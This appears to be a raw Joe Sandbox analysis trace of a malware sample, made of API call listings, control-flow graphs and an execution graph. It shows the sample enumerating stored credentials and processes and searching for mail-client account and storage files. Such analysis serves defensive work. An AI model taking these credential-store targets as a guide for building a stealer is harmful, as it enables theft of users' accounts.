                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D1B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 36F71D37
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D4B
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D58
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D72
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D7D
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D8A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                            • String ID:
                                                            • API String ID: 1454806937-0

                                                            Control-flow Graph

                                                            control_flow_graph 252 36f739be-36f739c8 253 36f73a6e-36f73a71 252->253 254 36f73a77 253->254 255 36f739cd-36f739dd 253->255 258 36f73a79-36f73a7d 254->258 256 36f739df-36f739e2 255->256 257 36f739ea-36f73a03 LoadLibraryExW 255->257 259 36f73a6b 256->259 260 36f739e8 256->260 261 36f73a55-36f73a5e 257->261 262 36f73a05-36f73a0e GetLastError 257->262 259->253 263 36f73a67-36f73a69 260->263 261->263 264 36f73a60-36f73a61 FreeLibrary 261->264 265 36f73a45 262->265 266 36f73a10-36f73a22 call 36f755f6 262->266 263->259 267 36f73a7e-36f73a80 263->267 264->263 269 36f73a47-36f73a49 265->269 266->265 272 36f73a24-36f73a36 call 36f755f6 266->272 267->258 269->261 270 36f73a4b-36f73a53 269->270 270->259 272->265 275 36f73a38-36f73a43 LoadLibraryExW 272->275 275->269
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 0-537541572

                                                            Control-flow Graph

                                                            control_flow_graph 276 4065c9-4065e9 GetSystemDirectoryW 277 4065eb 276->277 278 4065ed-4065ef 276->278 277->278 279 406600-406602 278->279 280 4065f1-4065fa 278->280 282 406603-406636 wsprintfW LoadLibraryExW 279->282 280->279 281 4065fc-4065fe 280->281 281->282
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                            • wsprintfW.USER32 ref: 0040661B
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 36F71038
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 36F7104B
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 36F71061
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 36F71075
                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 36F71090
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 36F710B8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                            • String ID:
                                                            • API String ID: 3594823470-0

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 36F71E89: lstrlenW.KERNEL32(?,?,?,?,?,36F710DF,?,?,?,00000000), ref: 36F71E9A
                                                              • Part of subcall function 36F71E89: lstrcatW.KERNEL32(?,?,?,36F710DF,?,?,?,00000000), ref: 36F71EAC
                                                              • Part of subcall function 36F71E89: lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EB3
                                                              • Part of subcall function 36F71E89: lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EC8
                                                              • Part of subcall function 36F71E89: lstrcatW.KERNEL32(?,36F710DF,?,36F710DF,?,?,?,00000000), ref: 36F71ED3
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 36F7122A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat$AttributesFile
                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                            • API String ID: 1475205934-1520055953

                                                            Control-flow Graph

                                                            control_flow_graph 323 4064f3-4064fe 324 406500-406505 323->324 325 406518-40651c 323->325 324->325 328 406507-40650c 324->328 326 40652b-406535 325->326 327 40651e-406526 call 405ba7 325->327 330 406577 326->330 331 406537-406538 326->331 327->326 339 406528 327->339 328->325 332 40650e-406513 328->332 333 40657b-40658c CharPrevW 330->333 335 40653e-406542 331->335 332->325 336 406515 332->336 337 406594-40659a 333->337 338 40658e-406592 333->338 340 406544-406553 call 405b5d 335->340 341 406569-406574 CharNextW 335->341 336->325 337->333 342 40659c-40659f 337->342 338->337 338->342 339->326 340->341 346 406555-406567 CharNextW call 405d0c CharNextW 340->346 341->335 344 406576 341->344 344->330 346->341
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                                            • CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                                            • CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,0040332B,007B5800,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":
                                                            • API String ID: 589700163-165019052

                                                            Control-flow Graph

                                                            control_flow_graph 349 36f74b39-36f74b61 GetModuleHandleExW 350 36f74b86-36f74b8a 349->350 351 36f74b63-36f74b76 GetProcAddress 349->351 352 36f74b95-36f74ba2 call 36f72ada 350->352 353 36f74b8c-36f74b8f FreeLibrary 350->353 354 36f74b85 351->354 355 36f74b78-36f74b83 351->355 353->352 354->350 355->354
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,36F74AEA,?,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000), ref: 36F74B59
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 36F74B6C
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,36F74AEA,?,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000,00000001,36F72082), ref: 36F74B8F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,36F79C07,?,00000000,?,00000000,00000000), ref: 36F794D4
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 36F79590
                                                            • WriteFile.KERNEL32(?,?,00000000,36F79C07,00000000,?,?,?,?,?,?,?,?,?,36F79C07,?), ref: 36F795AF
                                                            • WriteFile.KERNEL32(?,?,00000001,36F79C07,00000000,?,?,?,?,?,?,?,?,?,36F79C07,?), ref: 36F795E8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 977765425-0
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,36F710DF,?,?,?,00000000), ref: 36F71E9A
                                                            • lstrcatW.KERNEL32(?,?,?,36F710DF,?,?,?,00000000), ref: 36F71EAC
                                                            • lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EB3
                                                            • lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EC8
                                                            • lstrcatW.KERNEL32(?,36F710DF,?,36F710DF,?,?,?,00000000), ref: 36F71ED3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat
                                                            • String ID:
                                                            • API String ID: 493641738-0
                                                            • Opcode ID: a2e7e69da4c31ab2fe5f5bb7ce23f287ef46e0272490f7e540794f835def470f
                                                            • Instruction ID: da80d7ba7238a337c3083743c99530e37a43801767053339bd5379621562a8da
                                                            • Opcode Fuzzy Hash: a2e7e69da4c31ab2fe5f5bb7ce23f287ef46e0272490f7e540794f835def470f
                                                            • Instruction Fuzzy Hash: D4F089265001147BD621772AAC85E7F7B7CFFC5BA1F44141AF60893194DB54684392F6
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,36F7190E,?,?,00000000,?,00000000), ref: 36F71643
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,36F7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 36F7165A
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,36F7190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 36F71661
                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,36F7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 36F71686
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1475610065-0
                                                            • Opcode ID: f7b5829f7fc41b27130f90da53324d9b008f4cc46272107b48508bd08aa6b253
                                                            • Instruction ID: 6d23b10885551d8a12c84f72e05781b74945f419e3d9d6a20007ccee7bf4afb0
                                                            • Opcode Fuzzy Hash: f7b5829f7fc41b27130f90da53324d9b008f4cc46272107b48508bd08aa6b253
                                                            • Instruction Fuzzy Hash: 0E21DA36900204ABD704DF54DC84EEE7BB8EF88750F14442BEA04BB185DB34A64697B6
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 36F7715C
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 36F7717F
                                                              • Part of subcall function 36F756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 36F75702
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 36F771A5
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 36F771C7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                            • String ID:
                                                            • API String ID: 1794362364-0
                                                            • Opcode ID: 00c3ca689407d7f652f633f90bf1e26639b61acaed67c150a5f0e26a0e4286e5
                                                            • Instruction ID: 5d0da170fcf5ace102730e34849a5e2b5a87096aa9032cdd05ce17b9e02cea4a
                                                            • Opcode Fuzzy Hash: 00c3ca689407d7f652f633f90bf1e26639b61acaed67c150a5f0e26a0e4286e5
                                                            • Instruction Fuzzy Hash: B50188B6A153157B27111AB75C5CD7B7B6EDEC2AE0350152BBD04D7244DEA08C02C2F1
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,36F71D66,00000000,00000000,?,36F75C88,36F71D66,00000000,00000000,00000000,?,36F75E85,00000006,FlsSetValue), ref: 36F75D13
                                                            • GetLastError.KERNEL32(?,36F75C88,36F71D66,00000000,00000000,00000000,?,36F75E85,00000006,FlsSetValue,36F7E190,FlsSetValue,00000000,00000364,?,36F75BC8), ref: 36F75D1F
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,36F75C88,36F71D66,00000000,00000000,00000000,?,36F75E85,00000006,FlsSetValue,36F7E190,FlsSetValue,00000000), ref: 36F75D2D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 7341b746e81c8dd1443d55000e18fb216524b647fd743673bbf670496edd5b4d
                                                            • Instruction ID: 7dcb062c1b794c4b19e8cb488b98daa9c0cac7720bba0e8550fa162bca218dd2
                                                            • Opcode Fuzzy Hash: 7341b746e81c8dd1443d55000e18fb216524b647fd743673bbf670496edd5b4d
                                                            • Instruction Fuzzy Hash: E301473BA19332ABE3114A788C4CE66775BAF457F1B600E21FE09E7144DF20C802CAE4
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405D9E
                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040334E,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,75D53420,0040359C), ref: 00405DB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: nsa
                                                            • API String ID: 1716503409-2209301699
                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                            • Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                            • Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64

                                                            Execution Graph

                                                            Execution Coverage:6.8%
                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                            Signature Coverage:3.2%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:89
38431->38426 38431->38427 38431->38429 38431->38430 38433 445f3a 38431->38433 38835 409b98 GetFileAttributesW 38431->38835 38836 445093 23 API calls 38433->38836 38435->38232 38436->38238 38437->38232 38438->38230 38440 40c775 38439->38440 38838 40b1ab free free 38440->38838 38442 40c788 38839 40b1ab free free 38442->38839 38444 40c790 38840 40b1ab free free 38444->38840 38446 40c798 38447 40aa04 free 38446->38447 38448 40c7a0 38447->38448 38841 40c274 memset 38448->38841 38453 40a8ab 9 API calls 38454 40c7c3 38453->38454 38455 40a8ab 9 API calls 38454->38455 38456 40c7d0 38455->38456 38870 40c3c3 38456->38870 38460 40c877 38469 40bdb0 38460->38469 38461 40c86c 38912 4053fe 39 API calls 38461->38912 38462 40c7e5 38462->38460 38462->38461 38468 40c634 50 API calls 38462->38468 38895 40a706 38462->38895 38468->38462 39195 404363 38469->39195 38472 40bf63 39215 40440c 38472->39215 38473 40bdee 38473->38472 38477 40b2cc 27 API calls 38473->38477 38474 40bddf CredEnumerateW 38474->38473 38478 40be02 wcslen 38477->38478 38479 40bf5d LocalFree 38478->38479 38487 40be1e 38478->38487 38479->38472 38480 40be26 wcsncmp 38480->38487 38483 40be7d memset 38484 40bea7 memcpy 38483->38484 38483->38487 38485 40bf11 wcschr 38484->38485 38484->38487 38485->38487 38486 40b2cc 27 API calls 38488 40bef6 _wcsnicmp 38486->38488 38487->38479 38487->38480 38487->38483 38487->38484 38487->38485 38487->38486 38489 40bf43 LocalFree 38487->38489 39218 40bd5d 28 API calls 38487->39218 39219 404423 38487->39219 38488->38485 38488->38487 38489->38487 38490 4135f7 39234 4135e0 38490->39234 38493 40b2cc 27 API calls 38494 41360d 38493->38494 38495 40a804 8 API calls 38494->38495 38496 413613 38495->38496 38497 41361b 38496->38497 38498 41363e 38496->38498 38499 40b273 27 API calls 38497->38499 38500 4135e0 FreeLibrary 38498->38500 38501 413625 GetProcAddress 38499->38501 38502 413643 38500->38502 38501->38498 38503 413648 38501->38503 38502->38261 38504 413658 38503->38504 38505 4135e0 FreeLibrary 
38503->38505 38504->38261 38506 413666 38505->38506 38506->38261 39237 4449b9 38507->39237 38510 444c1f 38510->38242 38511 4449b9 42 API calls 38513 444b4b 38511->38513 38512 444c15 38515 4449b9 42 API calls 38512->38515 38513->38512 39258 444972 GetVersionExW 38513->39258 38515->38510 38516 444b99 memcmp 38521 444b8c 38516->38521 38517 444c0b 39262 444a85 42 API calls 38517->39262 38521->38516 38521->38517 39259 444aa5 42 API calls 38521->39259 39260 40a7a0 GetVersionExW 38521->39260 39261 444a85 42 API calls 38521->39261 38524 40399d 38523->38524 39263 403a16 38524->39263 38527 403a12 wcsrchr 38527->38251 38528 4039a3 38531 4039f4 38528->38531 38533 403a09 38528->38533 39274 40a02c CreateFileW 38528->39274 38532 4099c6 2 API calls 38531->38532 38531->38533 38532->38533 39277 40b1ab free free 38533->39277 38535 414c2e 17 API calls 38534->38535 38536 404048 38535->38536 38537 414c2e 17 API calls 38536->38537 38538 404056 38537->38538 38539 409d1f 6 API calls 38538->38539 38540 404073 38539->38540 38541 409d1f 6 API calls 38540->38541 38542 40408e 38541->38542 38543 409d1f 6 API calls 38542->38543 38544 4040a6 38543->38544 38545 403af5 20 API calls 38544->38545 38546 4040ba 38545->38546 38547 403af5 20 API calls 38546->38547 38548 4040cb 38547->38548 39304 40414f memset 38548->39304 38550 404140 39318 40b1ab free free 38550->39318 38552 4040ec memset 38553 4040e0 38552->38553 38553->38550 38553->38552 38555 4099c6 2 API calls 38553->38555 38556 40a8ab 9 API calls 38553->38556 38554 404148 38554->38316 38555->38553 38556->38553 39331 40a6e6 WideCharToMultiByte 38557->39331 38559 4087ed 39332 4095d9 memset 38559->39332 38562 408809 memset memset memset memset memset 38563 40b2cc 27 API calls 38562->38563 38564 4088a1 38563->38564 38565 409d1f 6 API calls 38564->38565 38566 4088b1 38565->38566 38567 40b2cc 27 API calls 38566->38567 38568 4088c0 38567->38568 38569 409d1f 6 API calls 38568->38569 38570 4088d0 38569->38570 38571 40b2cc 27 API calls 38570->38571 38572 
4088df 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 4088ef 38573->38574 38589 408953 38589->38316 38609 40b633 free 38608->38609 38610 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38609->38610 38611 413f00 Process32NextW 38610->38611 38612 413da5 OpenProcess 38611->38612 38613 413f17 CloseHandle 38611->38613 38614 413df3 memset 38612->38614 38617 413eb0 38612->38617 38613->38353 39757 413f27 38614->39757 38616 413ebf free 38616->38617 38617->38611 38617->38616 38618 4099f4 3 API calls 38617->38618 38618->38617 38619 413e37 GetModuleHandleW 38621 413e46 GetProcAddress 38619->38621 38622 413e1f 38619->38622 38621->38622 38622->38619 39762 413959 38622->39762 39778 413ca4 38622->39778 38624 413ea2 CloseHandle 38624->38617 38626 414c2e 17 API calls 38625->38626 38627 403eb7 38626->38627 38628 414c2e 17 API calls 38627->38628 38629 403ec5 38628->38629 38630 409d1f 6 API calls 38629->38630 38631 403ee2 38630->38631 38632 409d1f 6 API calls 38631->38632 38633 403efd 38632->38633 38634 409d1f 6 API calls 38633->38634 38635 403f15 38634->38635 38636 403af5 20 API calls 38635->38636 38637 403f29 38636->38637 38638 403af5 20 API calls 38637->38638 38639 403f3a 38638->38639 38640 40414f 33 API calls 38639->38640 38646 403f4f 38640->38646 38641 403faf 39792 40b1ab free free 38641->39792 38643 403f5b memset 38643->38646 38644 403fb7 38644->38289 38645 4099c6 2 API calls 38645->38646 38646->38641 38646->38643 38646->38645 38647 40a8ab 9 API calls 38646->38647 38647->38646 38649 414c2e 17 API calls 38648->38649 38650 403d26 38649->38650 38651 414c2e 17 API calls 38650->38651 38652 403d34 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 403d51 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403d6c 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 403d84 38657->38658 38659 403af5 20 API calls 38658->38659 38660 403d98 38659->38660 38661 403af5 20 API calls 38660->38661 38662 403da9 38661->38662 38663 40414f 33 API calls 38662->38663 
38669 403dbe 38663->38669 38664 403e1e 39793 40b1ab free free 38664->39793 38666 403dca memset 38666->38669 38667 403e26 38667->38304 38668 4099c6 2 API calls 38668->38669 38669->38664 38669->38666 38669->38668 38670 40a8ab 9 API calls 38669->38670 38670->38669 38672 414b81 9 API calls 38671->38672 38673 414c40 38672->38673 38674 414c73 memset 38673->38674 39794 409cea 38673->39794 38676 414c94 38674->38676 39797 414592 RegOpenKeyExW 38676->39797 38679 414c64 SHGetSpecialFolderPathW 38681 414d0b 38679->38681 38680 414cc1 38682 414cf4 wcscpy 38680->38682 39798 414bb0 wcscpy 38680->39798 38681->38296 38682->38681 38684 414cd2 39799 4145ac RegQueryValueExW 38684->39799 38686 414ce9 RegCloseKey 38686->38682 38688 409d62 38687->38688 38689 409d43 wcscpy 38687->38689 38688->38327 38690 409719 2 API calls 38689->38690 38691 409d51 wcscat 38690->38691 38691->38688 38693 40aebe FindClose 38692->38693 38694 40ae21 38693->38694 38695 4099c6 2 API calls 38694->38695 38696 40ae35 38695->38696 38697 409d1f 6 API calls 38696->38697 38698 40ae49 38697->38698 38698->38396 38700 40ade0 38699->38700 38703 40ae0f 38699->38703 38701 40ade7 wcscmp 38700->38701 38700->38703 38702 40adfe wcscmp 38701->38702 38701->38703 38702->38703 38703->38396 38705 40ae18 9 API calls 38704->38705 38710 4453c4 38705->38710 38706 40ae51 9 API calls 38706->38710 38707 4453f3 38709 40aebe FindClose 38707->38709 38708 40add4 2 API calls 38708->38710 38711 4453fe 38709->38711 38710->38706 38710->38707 38710->38708 38712 445403 254 API calls 38710->38712 38711->38396 38712->38710 38714 40ae7b FindNextFileW 38713->38714 38715 40ae5c FindFirstFileW 38713->38715 38716 40ae94 38714->38716 38717 40ae8f 38714->38717 38715->38716 38719 40aeb6 38716->38719 38720 409d1f 6 API calls 38716->38720 38718 40aebe FindClose 38717->38718 38718->38716 38719->38396 38720->38719 38721->38281 38722->38260 38723->38356 38724->38337 38725->38337 38726->38370 38728 409c89 38727->38728 38728->38392 38729->38423 38731 413d39 
